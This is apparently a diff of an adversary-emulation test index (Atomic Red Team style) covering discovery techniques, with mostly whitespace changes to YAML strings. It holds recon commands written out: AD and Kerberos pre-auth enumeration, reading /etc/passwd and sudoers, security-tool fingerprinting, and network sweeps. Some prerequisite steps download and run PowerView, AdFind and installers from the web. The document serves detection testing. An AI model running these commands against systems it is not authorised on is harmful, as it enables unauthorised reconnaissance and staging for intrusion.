       executor:
@@ -51128,7 +51128,7 @@ discovery:
         machines in the domain. Upon execution, information about each machine will
         be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -51141,7 +51141,7 @@ discovery:
       description: 'takes a computer and determines who has admin rights over it through
         GPO enumeration. Upon execution, information about the machine will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -51159,39 +51159,39 @@ discovery:
       description: 'When successful, accounts that do not require kerberos pre-auth
         will be returned
 
-'
+        '
       supported_platforms:
       - windows
       dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must be domain joined.
 
-'
+          '
         prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
           {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Write-Host Joining this computer to a domain must be
           done manually.
 
-'
+          '
       - description: 'Requires the Active Directory module for powershell to be installed.
 
-'
+          '
         prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
           0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
 
-'
+          '
       executor:
         name: powershell
         elevation_required: false
         command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth
           -eq $TRUE}
 
-'
+          '
     - name: Adfind - Query Active Directory Groups
       auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274
       description: |
@@ -51208,10 +51208,10 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
@@ -51301,7 +51301,7 @@ discovery:
       executor:
         command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr *
 
-'
+          '
         name: command_prompt
     - name: Windows - Discover domain trusts with nltest
       auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe
@@ -51314,17 +51314,17 @@ discovery:
       dependencies:
       - description: 'nltest.exe from RSAT must be present on disk
 
-'
+          '
         prereq_command: 'WHERE nltest.exe >NUL 2>&1
 
-'
+          '
         get_prereq_command: 'echo Sorry RSAT must be installed manually
 
-'
+          '
       executor:
         command: 'nltest /domain_trusts
 
-'
+          '
         name: command_prompt
     - name: Powershell enumerate domains and forests
       auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30
@@ -51337,26 +51337,26 @@ discovery:
       dependencies:
       - description: 'PowerView PowerShell script must exist on disk
 
-'
+          '
         prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1"
           -OutFile "$env:TEMP\PowerView.ps1"
 
-'
+          '
       - description: 'RSAT PowerShell AD admin cmdlets must be installed
 
-'
+          '
         prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And
           (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else {
           exit 1 }
 
-'
+          '
         get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually"
 
-'
+          '
       executor:
         command: |
           Import-Module "$env:TEMP\PowerView.ps1"
@@ -51381,14 +51381,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-'
+          '
       executor:
         command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
         name: command_prompt
@@ -51408,14 +51408,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-'
+          '
       executor:
         command: "#{adfind_path} -gcb -sc trustdmp\n"
         name: command_prompt
@@ -51549,7 +51549,7 @@ discovery:
       description: 'Find or discover files on the file system. Upon execution, file
         and folder information will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -51588,13 +51588,13 @@ discovery:
           which sh
         cleanup_command: 'rm #{output_file}
 
-'
+          '
         name: sh
     - name: Nix File and Directory Discovery 2
       auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e
       description: 'Find or discover files on the file system
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -51700,7 +51700,7 @@ discovery:
       auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f
       description: 'Enumerate all accounts by copying /etc/passwd to another file
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -51714,7 +51714,7 @@ discovery:
           cat #{output_file}
         cleanup_command: 'rm -f #{output_file}
 
-'
+          '
         name: sh
     - name: View sudoers access
       auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
@@ -51733,14 +51733,14 @@ discovery:
           cat #{output_file}
         cleanup_command: 'rm -f #{output_file}
 
-'
+          '
         name: sh
         elevation_required: true
     - name: View accounts with UID 0
       auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397
       description: 'View accounts with UID 0
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -51755,26 +51755,26 @@ discovery:
           cat #{output_file} 2>/dev/null
         cleanup_command: 'rm -f #{output_file} 2>/dev/null
 
-'
+          '
         name: sh
     - name: List opened files by user
       auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
       description: 'List opened files by user
 
-'
+        '
       supported_platforms:
       - linux
       - macos
       executor:
         command: 'username=$(id -u -n) && lsof -u $username
 
-'
+          '
         name: sh
     - name: Show if a user account has ever logged in remotely
       auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110
       description: 'Show if a user account has ever logged in remotely
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -51786,28 +51786,28 @@ discovery:
       dependencies:
       - description: 'Check if lastlog command exists on the machine
 
-'
+          '
         prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit
           1;
 
-'
+          '
         get_prereq_command: 'echo "Install lastlog on the machine to run the test.";
           exit 1;
 
-'
+          '
       executor:
         command: |
           lastlog > #{output_file}
           cat #{output_file}
         cleanup_command: 'rm -f #{output_file}
 
-'
+          '
         name: sh
     - name: Enumerate users and groups
       auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e
       description: 'Utilize groups and id to enumerate users and groups
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -51820,7 +51820,7 @@ discovery:
       auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2
       description: 'Utilize local utilities to enumerate users and groups
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -51851,7 +51851,7 @@ discovery:
       description: 'Enumerate all accounts via PowerShell. Upon execution, lots of
         user account and group information will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -51871,26 +51871,26 @@ discovery:
       description: 'Enumerate logged on users. Upon exeuction, logged on users will
         be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'query user
 
-'
+          '
         name: command_prompt
     - name: Enumerate logged on users via PowerShell
       auto_generated_guid: 2bdc42c7-8907-40c2-9c2b-42919a00fe03
       description: 'Enumerate logged on users via PowerShell. Upon exeuction, logged
         on users will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'query user
 
-'
+          '
         name: powershell
   T1069.001:
     technique:
@@ -51934,7 +51934,7 @@ discovery:
       auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae
       description: 'Permission Groups Discovery
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -52062,15 +52062,15 @@ discovery:
       dependencies:
       - description: 'Check if nmap command exists on the machine
 
-'
+          '
         prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
           fi;
 
-'
+          '
         get_prereq_command: 'echo "Install nmap on the machine to run the test.";
           exit 1;
 
-'
+          '
       executor:
         command: |
           nmap -sS #{network_range} -p #{port}
@@ -52095,7 +52095,7 @@ discovery:
       dependencies:
       - description: 'NMap must be installed
 
-'
+          '
         prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
         get_prereq_command: |
           Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
@@ -52108,7 +52108,7 @@ discovery:
       auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
       description: 'Scan ports to check for listening ports with python
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -52124,17 +52124,17 @@ discovery:
       dependencies:
       - description: 'Check if python exists on the machine
 
-'
+          '
         prereq_command: 'if (python --version) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'echo "Python 3 must be installed manually"
 
-'
+          '
       executor:
         command: 'python #{filename} -i #{host_ip}
 
-'
+          '
         name: powershell
   T1135:
     technique:
@@ -52198,7 +52198,7 @@ discovery:
       auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7
       description: 'Network Share Discovery
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -52216,7 +52216,7 @@ discovery:
       auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae
       description: 'Network Share Discovery using smbstatus
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -52232,16 +52232,16 @@ discovery:
       dependencies:
       - description: 'Package with smbstatus (samba) must exist on device
 
-'
+          '
         prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
           1; fi
 
-'
+          '
         get_prereq_command: "sudo #{package_installer} \n"
       executor:
         command: 'smbstatus --shares
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Network Share Discovery command prompt
@@ -52259,7 +52259,7 @@ discovery:
       executor:
         command: 'net view \\#{computer_name}
 
-'
+          '
         name: command_prompt
     - name: Network Share Discovery PowerShell
       auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb
@@ -52271,7 +52271,7 @@ discovery:
       executor:
         command: 'get-smbshare
 
-'
+          '
         name: powershell
     - name: View available share drives
       auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae
@@ -52283,28 +52283,28 @@ discovery:
       executor:
         command: 'net share
 
-'
+          '
         name: command_prompt
     - name: Share Discovery with PowerView
       auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd
       description: 'Enumerate Domain Shares the current user has access. Upon execution,
         progress info about each share being scanned will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       dependency_executor_name: powershell
       dependencies:
       - description: 'Endpoint must be joined to domain
 
-'
+          '
         prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain)
           {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: '"Join system to domain"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -52381,15 +52381,15 @@ discovery:
       dependencies:
       - description: 'Check if at least one of the tools are installed on the machine.
 
-'
+          '
         prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
-'
+          '
         get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run.";
           exit 1;
 
-'
+          '
       executor:
         command: |
           tcpdump -c 5 -nnni #{interface}
@@ -52413,15 +52413,15 @@ discovery:
       dependencies:
       - description: 'Check if at least one of the tools are installed on the machine.
 
-'
+          '
         prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
-'
+          '
         get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run.";
           exit 1;
 
-'
+          '
       executor:
         command: "sudo tcpdump -c 5 -nnni #{interface}    \nif [ -x \"$(command -v
           tshark)\" ]; then sudo tshark -c 5 -i #{interface}; fi;\n"
@@ -52462,14 +52462,14 @@ discovery:
       - description: 'tshark must be installed and in the default path of "c:\Program
           Files\Wireshark\Tshark.exe".
 
-'
+          '
         prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
         get_prereq_command: |
           Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
           Start-Process $env:temp\wireshark_installer.exe /S
       - description: 'npcap must be installed.
 
-'
+          '
         prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1}
         get_prereq_command: |
           Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
@@ -52477,7 +52477,7 @@ discovery:
       executor:
         command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Windows Internal Packet Capture
@@ -52550,57 +52550,57 @@ discovery:
       auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b'
       description: 'Lists the password complexity policy to console on Ubuntu Linux.
 
-'
+        '
       supported_platforms:
       - linux
       executor:
         command: 'cat /etc/pam.d/common-password
 
-'
+          '
         name: bash
     - name: Examine password complexity policy - CentOS/RHEL 7.x
       auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d
       description: 'Lists the password complexity policy to console on CentOS/RHEL
         7.x Linux.
 
-'
+        '
       supported_platforms:
       - linux
       dependencies:
       - description: 'System must be CentOS or RHEL v7
 
-'
+          '
         prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then
           exit /b 0; else exit /b 1; fi;
 
-'
+          '
         get_prereq_command: 'echo Please run from CentOS or RHEL v7
 
-'
+          '
       executor:
         command: 'cat /etc/security/pwquality.conf
 
-'
+          '
         name: bash
     - name: Examine password complexity policy - CentOS/RHEL 6.x
       auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358
       description: 'Lists the password complexity policy to console on CentOS/RHEL
         6.x Linux.
 
-'
+        '
       supported_platforms:
       - linux
       dependencies:
       - description: 'System must be CentOS or RHEL v6
 
-'
+          '
         prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then
           exit /b 0; else exit /b 1; fi;
 
-'
+          '
         get_prereq_command: 'echo Please run from CentOS or RHEL v6
 
-'
+          '
       executor:
         command: |
           cat /etc/pam.d/system-auth
@@ -52610,43 +52610,43 @@ discovery:
       auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a
       description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
 
-'
+        '
       supported_platforms:
       - linux
       executor:
         command: 'cat /etc/login.defs
 
-'
+          '
         name: bash
     - name: Examine local password policy - Windows
       auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6
       description: 'Lists the local password policy to console on Windows.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'net accounts
 
-'
+          '
         name: command_prompt
     - name: Examine domain password policy - Windows
       auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4
       description: 'Lists the domain password policy to console on Windows.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'net accounts /domain
 
-'
+          '
         name: command_prompt
     - name: Examine password policy - macOS
       auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742
       description: 'Lists the password policy to console on macOS.
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -52825,7 +52825,7 @@ discovery:
           ps aux >> #{output_file}
         cleanup_command: 'rm #{output_file}
 
-'
+          '
         name: sh
     - name: Process Discovery - tasklist
       auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908
@@ -52837,7 +52837,7 @@ discovery:
       executor:
         command: 'tasklist
 
-'
+          '
         name: command_prompt
   T1012:
     technique:
@@ -53005,7 +53005,7 @@ discovery:
       executor:
         command: 'net group "Domain Computers" /domain
 
-'
+          '
         name: command_prompt
     - name: Remote System Discovery - nltest
       auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
@@ -53023,7 +53023,7 @@ discovery:
       executor:
         command: 'nltest.exe /dclist:#{target_domain}
 
-'
+          '
         name: command_prompt
     - name: Remote System Discovery - ping sweep
       auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592
@@ -53036,7 +53036,7 @@ discovery:
       executor:
         command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
 
-'
+          '
         name: command_prompt
     - name: Remote System Discovery - arp
       auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574
@@ -53047,7 +53047,7 @@ discovery:
       executor:
         command: 'arp -a
 
-'
+          '
         name: command_prompt
     - name: Remote System Discovery - arp nix
       auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951
@@ -53062,18 +53062,18 @@ discovery:
       dependencies:
       - description: 'Check if arp command exists on the machine
 
-'
+          '
         prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1;
           fi;
 
-'
+          '
         get_prereq_command: 'echo "Install arp on the machine."; exit 1;
 
-'
+          '
       executor:
         command: 'arp -a | grep -v ''^?''
 
-'
+          '
         name: sh
     - name: Remote System Discovery - sweep
       auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de
@@ -53101,7 +53101,7 @@ discovery:
         command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip;
           [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
 
-'
+          '
         name: sh
     - name: Remote System Discovery - nslookup
       auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f
@@ -53146,35 +53146,35 @@ discovery:
       dependencies:
       - description: 'Computer must have python 3 installed
 
-'
+          '
         prereq_command: 'if (python --version) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'echo "Python 3 must be installed manually"
 
-'
+          '
       - description: 'Computer must have pip installed
 
-'
+          '
         prereq_command: 'if (pip3 -V) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'echo "PIP must be installed manually"
 
-'
+          '
       - description: 'adidnsdump must be installed and part of PATH
 
-'
+          '
         prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'pip3 install adidnsdump
 
-'
+          '
       executor:
         command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Adfind - Enumerate Active Directory Computer Objects
@@ -53193,14 +53193,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-'
+          '
       executor:
         command: "#{adfind_path} -f (objectcategory=computer)\n"
         name: command_prompt
@@ -53220,14 +53220,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-'
+          '
       executor:
         command: "#{adfind_path} -sc dclist\n"
         name: command_prompt
@@ -53331,7 +53331,7 @@ discovery:
       executor:
         command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu''
 
-'
+          '
         name: sh
     - name: Security Software Discovery - ps (Linux)
       auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2
@@ -53343,7 +53343,7 @@ discovery:
       executor:
         command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd''
 
-'
+          '
         name: sh
     - name: Security Software Discovery - Sysmon Service
       auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9
@@ -53356,7 +53356,7 @@ discovery:
       executor:
         command: 'fltmc.exe | findstr.exe 385201
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Security Software Discovery - AV Discovery via WMI
@@ -53433,7 +53433,7 @@ discovery:
         command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer"
           /v svcVersion
 
-'
+          '
         name: command_prompt
     - name: Applications Installed
       auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b
@@ -53453,7 +53453,7 @@ discovery:
         software that is installed on the system. Adversaries may use the information
         from Software Discovery during automated discovery to shape follow-on behaviors
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -53562,7 +53562,7 @@ discovery:
           | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization
           Environment detected"; fi;
 
-'
+          '
     - name: Detect Virtualization Environment (Windows)
       auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
       description: 'Windows Management Instrumentation(WMI) objects contains system
@@ -53572,7 +53572,7 @@ discovery:
         This is meant to find the result of Not supported, which is the result if
         run in a virtual machine
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -53589,7 +53589,7 @@ discovery:
         the system. If it''s a virtual machine, one of the device manufacturer will
         be a Virtualization Software.
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -53599,7 +53599,7 @@ discovery:
           ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
           detected''; fi;
 
-'
+          '
   T1082:
     technique:
       object_marking_refs:
@@ -53667,7 +53667,7 @@ discovery:
       description: 'Identify System Info. Upon execution, system info and time info
         will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -53679,7 +53679,7 @@ discovery:
       auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6
       description: 'Identify System Info
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -53691,7 +53691,7 @@ discovery:
       auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c
       description: 'Identify System Info
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -53708,14 +53708,14 @@ discovery:
           #{output_file} 2>/dev/null\n"
         cleanup_command: 'rm #{output_file} 2>/dev/null
 
-'
+          '
         name: sh
     - name: Linux VM Check via Hardware
       auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec
       description: 'Identify virtual machine hardware. This technique is used by the
         Pupy RAT and other malware.
 
-'
+        '
       supported_platforms:
       - linux
       executor:
@@ -53734,7 +53734,7 @@ discovery:
       description: 'Identify virtual machine guest kernel modules. This technique
         is used by the Pupy RAT and other malware.
 
-'
+        '
       supported_platforms:
       - linux
       executor:
@@ -53750,40 +53750,40 @@ discovery:
       description: 'Identify system hostname for Windows. Upon execution, the hostname
         of the device will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'hostname
 
-'
+          '
         name: command_prompt
     - name: Hostname Discovery
       auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133
       description: 'Identify system hostname for Linux and macOS systems.
 
-'
+        '
       supported_platforms:
       - linux
       - macos
       executor:
         command: 'hostname
 
-'
+          '
         name: bash
     - name: Windows MachineGUID Discovery
       auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8
       description: 'Identify the Windows MachineGUID value for a system. Upon execution,
         the machine GUID will be displayed from registry.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v
           MachineGuid
 
-'
+          '
         name: command_prompt
     - name: Griffon Recon
       auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370
@@ -53810,27 +53810,27 @@ discovery:
       description: 'Identify all environment variables. Upon execution, environments
         variables and your path info will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'set
 
-'
+          '
         name: command_prompt
     - name: Environment variables discovery on macos and linux
       auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720
       description: 'Identify all environment variables. Upon execution, environments
         variables and your path info will be displayed.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
       executor:
         command: 'env
 
-'
+          '
         name: sh
   T1614:
     technique:
@@ -53977,7 +53977,7 @@ discovery:
       executor:
         command: 'netsh advfirewall firewall show rule name=all
 
-'
+          '
         name: command_prompt
     - name: System Network Configuration Discovery
       auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17
@@ -54037,10 +54037,10 @@ discovery:
       dependencies:
       - description: 'Test requires #{port_file} to exist
 
-'
+          '
         prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
@@ -54059,7 +54059,7 @@ discovery:
           | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n"
         cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}"
 
-'
+          '
         name: powershell
     - name: Adfind - Enumerate Active Directory Subnet Objects
       auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee
@@ -54077,14 +54077,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-'
+          '
       executor:
         command: "#{adfind_path} -f (objectcategory=subnet)\n"
         name: command_prompt
@@ -54213,7 +54213,7 @@ discovery:
       executor:
         command: 'Get-NetTCPConnection
 
-'
+          '
         name: powershell
     - name: System Network Connections Discovery Linux & MacOS
       auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
@@ -54228,14 +54228,14 @@ discovery:
       dependencies:
       - description: 'Check if netstat command exists on the machine
 
-'
+          '
         prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'echo "Install netstat on the machine."; exit 1;
 
-'
+          '
       executor:
         command: |
           netstat
@@ -54269,10 +54269,10 @@ discovery:
       dependencies:
       - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView})
 
-'
+          '
         prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
@@ -54451,10 +54451,10 @@ discovery:
       executor:
         command: 'net.exe start >> #{output_file}
 
-'
+          '
         cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
 
-'
+          '
         name: command_prompt
   T1124:
     technique:
@@ -54521,7 +54521,7 @@ discovery:
       description: 'Identify the system time. Upon execution, the local computer system
         time and timezone will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -54539,13 +54539,13 @@ discovery:
       description: 'Identify the system time via PowerShell. Upon execution, the system
         time will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'Get-Date
 
-'
+          '
         name: powershell
   T1497.003:
     technique:
@@ -58138,7 +58138,7 @@ execution:
